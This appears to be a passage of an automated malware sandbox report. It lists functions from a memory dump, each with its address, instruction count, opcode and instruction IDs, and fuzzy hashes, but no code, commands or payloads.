                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a16d913598b4bfad7ce51d3b49925f146bd6cb744e35989e684c5a7b2d8f81bd
                    • Instruction ID: 79eb3bd534cc0adaffbf55210ad0169a34fa37c003384ac32fdd1ae6a5286570
                    • Opcode Fuzzy Hash: a16d913598b4bfad7ce51d3b49925f146bd6cb744e35989e684c5a7b2d8f81bd
                    • Instruction Fuzzy Hash: 5631C970E1891D8FDF94EF58D495BEEBBB1FBA8345F10012AD409E3295CB35A845CB84
                    Function 00007FF848F21AA5 Relevance: .1, Instructions: 98COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1acf7ae58e9f2f0f10dde0bbb3d96e23fb2b57e4854b560c119d74b423b8d2e5
                    • Instruction ID: a88067fc9316b8cfe13b103e95b9476be3d4466431ceaf439f9af99ec0d6ea64
                    • Opcode Fuzzy Hash: 1acf7ae58e9f2f0f10dde0bbb3d96e23fb2b57e4854b560c119d74b423b8d2e5
                    • Instruction Fuzzy Hash: 5A313430D1C54ACFEBA8FF94A4915BD76B5FF44380F5001BAD00ED61D1EB2AB9808B89
                    Function 00007FF848F19210 Relevance: .1, Instructions: 94COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6395e6980980e4f7e473a001f5b4e5669c0081630ce2d6ed2255a89b24e13de7
                    • Instruction ID: 721af73831debfeca297921278469003f1261e9118341327b50a73541f132a0b
                    • Opcode Fuzzy Hash: 6395e6980980e4f7e473a001f5b4e5669c0081630ce2d6ed2255a89b24e13de7
                    • Instruction Fuzzy Hash: 9A31663091DA4EDFDB84EB58D840AEDBBB1FF58344F50017AE00AE3281DB38A955CB59
                    Function 00007FF848F13E1A Relevance: .1, Instructions: 94COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c25de46f64c2b951c36bd67be2d70323313b41a4cdc8d1e09315e5048d89954
                    • Instruction ID: e0a525c14a22a4a6af2c85108ea828abaccc756360ca3b43037abd8ed0c5f8b3
                    • Opcode Fuzzy Hash: 7c25de46f64c2b951c36bd67be2d70323313b41a4cdc8d1e09315e5048d89954
                    • Instruction Fuzzy Hash: A2312C34D0961D8FEBA8EB18C8557A8B3B1FF54350F1002B9D49DD2291DF39AE86CB40
                    Function 00007FF848F13A8D Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0eed601ef25271da3848d4744a43e95c49ae0e89fa41e94c07128490147ea440
                    • Instruction ID: 9a1a7894a0cd7f8c77d8ccab3712a03feb300713de9c228ae97812b78f198598
                    • Opcode Fuzzy Hash: 0eed601ef25271da3848d4744a43e95c49ae0e89fa41e94c07128490147ea440
                    • Instruction Fuzzy Hash: CD21AE31E0DA8A8FE799EB288C647A57BA0FF51341F0804B9D088D71D2DF796C45CB05
                    Function 00007FF848F2A540 Relevance: .1, Instructions: 88COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ea431061ef6d3d54e8ae649b6bb4341d83285ef32159e38c2a2109f0e65fdc80
                    • Instruction ID: 3ce4555c12d8042677145b32e92bd864229234d02cc00d87893d5940f4c5f839
                    • Opcode Fuzzy Hash: ea431061ef6d3d54e8ae649b6bb4341d83285ef32159e38c2a2109f0e65fdc80
                    • Instruction Fuzzy Hash: CD310070D08A1DAFDF94EBA8C8456EDBBB1FF58300F04013AE009E7291DB38A841CB44
                    Function 00007FF848F19A25 Relevance: .1, Instructions: 84COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ae620db57c656205b5b8b90f841d2e8c7a6ffcf18df78200100479b12fb3a94d
                    • Instruction ID: d161b5df089db1830055daa6ccd8def2559781cc5a04c0f2147547f4c90b23b0
                    • Opcode Fuzzy Hash: ae620db57c656205b5b8b90f841d2e8c7a6ffcf18df78200100479b12fb3a94d
                    • Instruction Fuzzy Hash: F9212131A0D64A4FD786EB2884901A13BA1FF96340B5901F6C40CCF5DBCA28EC06C794
                    Function 00007FF848F19A61 Relevance: .1, Instructions: 80COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cab20bc6bc0605209f1331026bbcdfcdbb604afe22aeba13154f816764a5ac56
                    • Instruction ID: 2fbc7d489c3db86345f3d9b9b77503fb3cfdb6f68d8d173fbb874fc5b78d8852
                    • Opcode Fuzzy Hash: cab20bc6bc0605209f1331026bbcdfcdbb604afe22aeba13154f816764a5ac56
                    • Instruction Fuzzy Hash: 3021D131B0DA0A4FD785EF2CC4815A273A1FF99350B5542B6D80CCB59BCB28EC45C784
                    Function 00007FF848F1DA92 Relevance: .1, Instructions: 68COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e15c46e7d47dad2948efe3037b1ede788f5983bce7e9aeb127913125e52ddce0
                    • Instruction ID: f88fc160504acfcc15b49914c6464c523d1d608151132770ec29b0353f54686d
                    • Opcode Fuzzy Hash: e15c46e7d47dad2948efe3037b1ede788f5983bce7e9aeb127913125e52ddce0
                    • Instruction Fuzzy Hash: D5214131E4E2C65EE36AF73858611B97E705F42390F1901FAD48A8A0D3CF4C2D45935A
                    Function 00007FF848F1FA40 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3cfe3cf396ae3e46ccf4eb2208649a21c74682e27d04e1b102831c3af721b1de
                    • Instruction ID: 53921976235466056ffca33bbdbc0f757f1a84fea0c26e54e284b68221eb48b3
                    • Opcode Fuzzy Hash: 3cfe3cf396ae3e46ccf4eb2208649a21c74682e27d04e1b102831c3af721b1de
                    • Instruction Fuzzy Hash: D311C131A1DA0A8EEB59FB2480505FA73A1FF543D2F040A3AD44EC36D2CF2CBC0586A4
                    Function 00007FF848F2428B Relevance: .1, Instructions: 55COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d9267ef20d467660dde00b48026f6fb02538d217a0e5668e9ce0dac77f6cc24
                    • Instruction ID: cd030dd310b7d2a13f88d2016ba277855ac4853f0fe03ab9ba57b7e94964f2fd
                    • Opcode Fuzzy Hash: 8d9267ef20d467660dde00b48026f6fb02538d217a0e5668e9ce0dac77f6cc24
                    • Instruction Fuzzy Hash: AE118E71D0C51A8EEBA4EB08A8066BA73B0FFA4351F0001B6D50D930C2EF7D68454BA9
                    Function 00007FF848F16680 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 049eea79fe012fc1539d2bd39f82a735fb7f0ae4cb546c018470bb10087b9d2c
                    • Instruction ID: a19397ef35928710980c3960567866ef36215dedabbdea48768eaadaab9cfb7d
                    • Opcode Fuzzy Hash: 049eea79fe012fc1539d2bd39f82a735fb7f0ae4cb546c018470bb10087b9d2c
                    • Instruction Fuzzy Hash: B2018C31D4894C8FCB55EF5AAC002D977B4FB9A318F00126AD45CD7180E7759A9AC745
                    Function 00007FF848F13DFB Relevance: .0, Instructions: 47COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 280cccd40ca7033bd9155d856e71dea14e309145c5a8a66c31c177276c3d30d9
                    • Instruction ID: 040b5cec5c528b395a45e34ded1dcc88d9ac7f6edf548e90a4d8926e42269515
                    • Opcode Fuzzy Hash: 280cccd40ca7033bd9155d856e71dea14e309145c5a8a66c31c177276c3d30d9
                    • Instruction Fuzzy Hash: AA111C34D1961D8FE7A8EB28C8553A9B3A1EF54344F1045B9D49DC22D1CE39AD86CB40
                    Function 00007FF848F1CA60 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 187aa3a2be76c33488fc3b53b00943a82dda034adb02a4f25f291104bdbd4216
                    • Instruction ID: e0f58d104f9cd8dd84868a4c60aff53c29fed4a3e9495e214d19b5123f26abc8
                    • Opcode Fuzzy Hash: 187aa3a2be76c33488fc3b53b00943a82dda034adb02a4f25f291104bdbd4216
                    • Instruction Fuzzy Hash: 62012C305194064FDB88EF54D0C2DA6B361FFA4350B2482B5D4099B29FEA2CFC91C7E4
                    Function 00007FF848F13E0B Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b607798bff7510bf2e580cc36665b963b99124b5bbdc2c744955ef2a6a64e91c
                    • Instruction ID: adef7cc3c0d20046b316e767971534d511436813d173cc046af46b02116bdca1
                    • Opcode Fuzzy Hash: b607798bff7510bf2e580cc36665b963b99124b5bbdc2c744955ef2a6a64e91c
                    • Instruction Fuzzy Hash: 97113C34C196198FD768EB28C8493A9B3A1FF54350F1045F9D49DD2292CF396D86CB40
                    Function 00007FF848F1CD63 Relevance: .0, Instructions: 42COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b34b2f15f38c3adba62f18c9ae9706a07f4ae5d475cc9065597007e26d794153
                    • Instruction ID: 2cdf2188991a78b504f26a840efcf521f035265c2183f03c07b5f9fd8a330ab1
                    • Opcode Fuzzy Hash: b34b2f15f38c3adba62f18c9ae9706a07f4ae5d475cc9065597007e26d794153
                    • Instruction Fuzzy Hash: A4016231D0D65D8FDB65BB508802AFDB760EF12380F4112BAC05E570D2EF782E998B95
                    Function 00007FF848F17E70 Relevance: .0, Instructions: 38COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000016.00000002.3280764125.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc345b4fca8f9ad06609269a77e2d77d4632e3feac5adbc11df003ebb780d7c4
                    • Instruction ID: e3d0084122ddb6d5d5000e3e0ace630bff8fa012fea3c4503e9c1f3d6b3b3c20
                    • Opcode Fuzzy Hash: dc345b4fca8f9ad06609269a77e2d77d4632e3feac5adbc11df003ebb780d7c4
                    • Instruction Fuzzy Hash: 51F03A3151CB495FC788EB18D4509ABB7E1EFD8391F840A3EF44AD23A4CF619D408B82